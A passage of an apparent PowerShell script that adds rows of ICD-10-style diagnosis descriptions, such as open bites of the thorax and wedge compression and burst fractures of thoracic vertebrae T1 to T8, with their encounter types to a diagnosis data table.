thorax, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of unspecified part of thorax","Open bite of unspecified part of thorax, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of unspecified part of thorax","Open bite of unspecified part of thorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of unspecified part of thorax","Open bite of unspecified part of thorax, sequela") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of unspecified thoracic vertebra","Wedge compression fracture of unspecified thoracic vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of unspecified thoracic vertebra","Wedge compression fracture of unspecified thoracic vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of unspecified thoracic vertebra","Wedge compression fracture of unspecified thoracic vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of unspecified thoracic vertebra","Wedge compression fracture of unspecified thoracic vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of unspecified thoracic vertebra","Wedge compression fracture of unspecified thoracic vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of unspecified thoracic vertebra","Wedge compression fracture of unspecified thoracic vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of unspecified thoracic vertebra","Stable burst fracture of unspecified thoracic vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of unspecified thoracic vertebra","Stable burst fracture of unspecified thoracic vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of unspecified thoracic vertebra","Stable burst fracture of unspecified thoracic vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of unspecified thoracic vertebra","Stable burst fracture of unspecified thoracic vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of unspecified thoracic vertebra","Stable burst fracture of unspecified thoracic vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of unspecified thoracic vertebra","Stable burst fracture of unspecified thoracic vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of unspecified thoracic vertebra","Unstable burst fracture of unspecified thoracic vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of unspecified thoracic vertebra","Unstable burst fracture of unspecified thoracic vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of unspecified thoracic vertebra","Unstable burst fracture of unspecified thoracic vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of unspecified thoracic vertebra","Unstable burst fracture of unspecified thoracic vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of unspecified thoracic vertebra","Unstable burst fracture of unspecified thoracic vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of unspecified thoracic vertebra","Unstable burst fracture of unspecified thoracic vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified thoracic vertebra","Other fracture of unspecified thoracic vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified thoracic vertebra","Other fracture of unspecified thoracic vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified thoracic vertebra","Other fracture of unspecified thoracic vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified thoracic vertebra","Other fracture of unspecified thoracic vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified thoracic vertebra","Other fracture of unspecified thoracic vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified thoracic vertebra","Other fracture of unspecified thoracic vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified thoracic vertebra","Unspecified fracture of unspecified thoracic vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified thoracic vertebra","Unspecified fracture of unspecified thoracic vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified thoracic vertebra","Unspecified fracture of unspecified thoracic vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified thoracic vertebra","Unspecified fracture of unspecified thoracic vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified thoracic vertebra","Unspecified fracture of unspecified thoracic vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified thoracic vertebra","Unspecified fracture of unspecified thoracic vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of first thoracic vertebra","Wedge compression fracture of first thoracic vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of first thoracic vertebra","Wedge compression fracture of first thoracic vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of first thoracic vertebra","Wedge compression fracture of first thoracic vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of first thoracic vertebra","Wedge compression fracture of first thoracic vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of first thoracic vertebra","Wedge compression fracture of first thoracic vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of first thoracic vertebra","Wedge compression fracture of first thoracic vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of first thoracic vertebra","Stable burst fracture of first thoracic vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of first thoracic vertebra","Stable burst fracture of first thoracic vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of first thoracic vertebra","Stable burst fracture of first thoracic vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of first thoracic vertebra","Stable burst fracture of first thoracic vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of first thoracic vertebra","Stable burst fracture of first thoracic vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of first thoracic vertebra","Stable burst fracture of first thoracic vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of first thoracic vertebra","Unstable burst fracture of first thoracic vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of first thoracic vertebra","Unstable burst fracture of first thoracic vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of first thoracic vertebra","Unstable burst fracture of first thoracic vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of first thoracic vertebra","Unstable burst fracture of first thoracic vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of first thoracic vertebra","Unstable burst fracture of first thoracic vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of first thoracic vertebra","Unstable burst fracture of first thoracic vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of first thoracic vertebra","Other fracture of first thoracic vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of first thoracic vertebra","Other fracture of first thoracic vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of first thoracic vertebra","Other fracture of first thoracic vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of first thoracic vertebra","Other fracture of first thoracic vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of first thoracic vertebra","Other fracture of first thoracic vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of first thoracic vertebra","Other fracture of first thoracic vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of first thoracic vertebra","Unspecified fracture of first thoracic vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of first thoracic vertebra","Unspecified fracture of first thoracic vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of first thoracic vertebra","Unspecified fracture of first thoracic vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of first thoracic vertebra","Unspecified fracture of first thoracic vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of first thoracic vertebra","Unspecified fracture of first thoracic vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of first thoracic vertebra","Unspecified fracture of first thoracic vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of second thoracic vertebra","Wedge compression fracture of second thoracic vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of second thoracic vertebra","Wedge compression fracture of second thoracic vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of second thoracic vertebra","Wedge compression fracture of second thoracic vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of second thoracic vertebra","Wedge compression fracture of second thoracic vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of second thoracic vertebra","Wedge compression fracture of second thoracic vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of second thoracic vertebra","Wedge compression fracture of second thoracic vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of second thoracic vertebra","Stable burst fracture of second thoracic vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of second thoracic vertebra","Stable burst fracture of second thoracic vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of second thoracic vertebra","Stable burst fracture of second thoracic vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of second thoracic vertebra","Stable burst fracture of second thoracic vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of second thoracic vertebra","Stable burst fracture of second thoracic vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of second thoracic vertebra","Stable burst fracture of second thoracic vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of second thoracic vertebra","Unstable burst fracture of second thoracic vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of second thoracic vertebra","Unstable burst fracture of second thoracic vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of second thoracic vertebra","Unstable burst fracture of second thoracic vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of second thoracic vertebra","Unstable burst fracture of second thoracic vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of second thoracic vertebra","Unstable burst fracture of second thoracic vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of second thoracic vertebra","Unstable burst fracture of second thoracic vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of second thoracic vertebra","Other fracture of second thoracic vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of second thoracic vertebra","Other fracture of second thoracic vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of second thoracic vertebra","Other fracture of second thoracic vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of second thoracic vertebra","Other fracture of second thoracic vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of second thoracic vertebra","Other fracture of second thoracic vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of second thoracic vertebra","Other fracture of second thoracic vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of second thoracic vertebra","Unspecified fracture of second thoracic vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of second thoracic vertebra","Unspecified fracture of second thoracic vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of second thoracic vertebra","Unspecified fracture of second thoracic vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of second thoracic vertebra","Unspecified fracture of second thoracic vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of second thoracic vertebra","Unspecified fracture of second thoracic vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of second thoracic vertebra","Unspecified fracture of second thoracic vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of third thoracic vertebra","Wedge compression fracture of third thoracic vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of third thoracic vertebra","Wedge compression fracture of third thoracic vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of third thoracic vertebra","Wedge compression fracture of third thoracic vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of third thoracic vertebra","Wedge compression fracture of third thoracic vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of third thoracic vertebra","Wedge compression fracture of third thoracic vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of third thoracic vertebra","Wedge compression fracture of third thoracic vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of third thoracic vertebra","Stable burst fracture of third thoracic vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of third thoracic vertebra","Stable burst fracture of third thoracic vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of third thoracic vertebra","Stable burst fracture of third thoracic vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of third thoracic vertebra","Stable burst fracture of third thoracic vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of third thoracic vertebra","Stable burst fracture of third thoracic vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of third thoracic vertebra","Stable burst fracture of third thoracic vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of third thoracic vertebra","Unstable burst fracture of third thoracic vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of third thoracic vertebra","Unstable burst fracture of third thoracic vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of third thoracic vertebra","Unstable burst fracture of third thoracic vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of third thoracic vertebra","Unstable burst fracture of third thoracic vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of third thoracic vertebra","Unstable burst fracture of third thoracic vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of third thoracic vertebra","Unstable burst fracture of third thoracic vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of third thoracic vertebra","Other fracture of third thoracic vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of third thoracic vertebra","Other fracture of third thoracic vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of third thoracic vertebra","Other fracture of third thoracic vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of third thoracic vertebra","Other fracture of third thoracic vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of third thoracic vertebra","Other fracture of third thoracic vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of third thoracic vertebra","Other fracture of third thoracic vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of third thoracic vertebra","Unspecified fracture of third thoracic vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of third thoracic vertebra","Unspecified fracture of third thoracic vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of third thoracic vertebra","Unspecified fracture of third thoracic vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of third thoracic vertebra","Unspecified fracture of third thoracic vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of third thoracic vertebra","Unspecified fracture of third thoracic vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of third thoracic vertebra","Unspecified fracture of third thoracic vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of fourth thoracic vertebra","Wedge compression fracture of fourth thoracic vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of fourth thoracic vertebra","Wedge compression fracture of fourth thoracic vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of fourth thoracic vertebra","Wedge compression fracture of fourth thoracic vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of fourth thoracic vertebra","Wedge compression fracture of fourth thoracic vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of fourth thoracic vertebra","Wedge compression fracture of fourth thoracic vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of fourth thoracic vertebra","Wedge compression fracture of fourth thoracic vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of fourth thoracic vertebra","Stable burst fracture of fourth thoracic vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of fourth thoracic vertebra","Stable burst fracture of fourth thoracic vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of fourth thoracic vertebra","Stable burst fracture of fourth thoracic vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of fourth thoracic vertebra","Stable burst fracture of fourth thoracic vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of fourth thoracic vertebra","Stable burst fracture of fourth thoracic vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of fourth thoracic vertebra","Stable burst fracture of fourth thoracic vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of fourth thoracic vertebra","Unstable burst fracture of fourth thoracic vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of fourth thoracic vertebra","Unstable burst fracture of fourth thoracic vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of fourth thoracic vertebra","Unstable burst fracture of fourth thoracic vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of fourth thoracic vertebra","Unstable burst fracture of fourth thoracic vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of fourth thoracic vertebra","Unstable burst fracture of fourth thoracic vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of fourth thoracic vertebra","Unstable burst fracture of fourth thoracic vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of fourth thoracic vertebra","Other fracture of fourth thoracic vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of fourth thoracic vertebra","Other fracture of fourth thoracic vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of fourth thoracic vertebra","Other fracture of fourth thoracic vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of fourth thoracic vertebra","Other fracture of fourth thoracic vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of fourth thoracic vertebra","Other fracture of fourth thoracic vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of fourth thoracic vertebra","Other fracture of fourth thoracic vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of fourth thoracic vertebra","Unspecified fracture of fourth thoracic vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of fourth thoracic vertebra","Unspecified fracture of fourth thoracic vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of fourth thoracic vertebra","Unspecified fracture of fourth thoracic vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of fourth thoracic vertebra","Unspecified fracture of fourth thoracic vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of fourth thoracic vertebra","Unspecified fracture of fourth thoracic vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of fourth thoracic vertebra","Unspecified fracture of fourth thoracic vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of T5-T6 vertebra","Wedge compression fracture of T5-T6 vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of T5-T6 vertebra","Wedge compression fracture of T5-T6 vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of T5-T6 vertebra","Wedge compression fracture of T5-T6 vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of T5-T6 vertebra","Wedge compression fracture of T5-T6 vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of T5-T6 vertebra","Wedge compression fracture of T5-T6 vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of T5-T6 vertebra","Wedge compression fracture of T5-T6 vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of T5-T6 vertebra","Stable burst fracture of T5-T6 vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of T5-T6 vertebra","Stable burst fracture of T5-T6 vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of T5-T6 vertebra","Stable burst fracture of T5-T6 vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of T5-T6 vertebra","Stable burst fracture of T5-T6 vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of T5-T6 vertebra","Stable burst fracture of T5-T6 vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of T5-T6 vertebra","Stable burst fracture of T5-T6 vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of T5-T6 vertebra","Unstable burst fracture of T5-T6 vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of T5-T6 vertebra","Unstable burst fracture of T5-T6 vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of T5-T6 vertebra","Unstable burst fracture of T5-T6 vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of T5-T6 vertebra","Unstable burst fracture of T5-T6 vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of T5-T6 vertebra","Unstable burst fracture of T5-T6 vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of T5-T6 vertebra","Unstable burst fracture of T5-T6 vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of T5-T6 vertebra","Other fracture of T5-T6 vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of T5-T6 vertebra","Other fracture of T5-T6 vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of T5-T6 vertebra","Other fracture of T5-T6 vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of T5-T6 vertebra","Other fracture of T5-T6 vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of T5-T6 vertebra","Other fracture of T5-T6 vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of T5-T6 vertebra","Other fracture of T5-T6 vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of T5-T6 vertebra","Unspecified fracture of T5-T6 vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of T5-T6 vertebra","Unspecified fracture of T5-T6 vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of T5-T6 vertebra","Unspecified fracture of T5-T6 vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of T5-T6 vertebra","Unspecified fracture of T5-T6 vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of T5-T6 vertebra","Unspecified fracture of T5-T6 vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of T5-T6 vertebra","Unspecified fracture of T5-T6 vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of T7-T8 vertebra","Wedge compression fracture of T7-T8 vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of T7-T8 vertebra","Wedge compression fracture of T7-T8 vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of T7-T8 vertebra","Wedge compression fracture of T7-T8 vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of T7-T8 vertebra","Wedge compression fracture of T7-T8 vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of T7-T8 vertebra","Wedge compression fracture of T7-T8 vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of T7-T8 vertebra","Wedge compression fracture of T7-T8 vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of T7-T8 vertebra","Stable burst fracture of T7-T8 vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of T7-T8 vertebra","Stable burst fracture of T7-T8 vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of T7-T8 vertebra","Stable burst fracture of T7-T8 vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of T7-T8 vertebra","Stable burst fracture of T7-T8 vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of T7-T8 vertebra","Stable burst fracture of T7-T8 vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of T7-T8 vertebra","Stable burst fracture of T7-T8 vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of T7-T8 vertebra","Unstable burst fracture of T7-T8 vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of T7-T8 vertebra","Unstable burst fracture of T7-T8 vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of T7-T8 vertebra","Unstable burst fracture of T7-T8 vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of T7-T8 vertebra","Unstable burst fracture of T7-T8 vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of T7-T8 vertebra","Unstable burst fracture of T7-T8 vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of T7-T8 vertebra","Unstable burst fracture of T7-T8 vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of T7-T8 thoracic vertebra","Other fracture of T7-T8 thoracic vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of T7-T8 thoracic vertebra","Other fracture of T7-T8 thoracic vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of T7-T8 thoracic vertebra","Other fracture of T7-T8 thoracic vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of T7-T8 thoracic vertebra","Other fracture of T7-T8 thoracic vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of T7-T8 thoracic vertebra","Other fracture of T7-T8 thoracic vertebra, subsequent encounter for fracture with 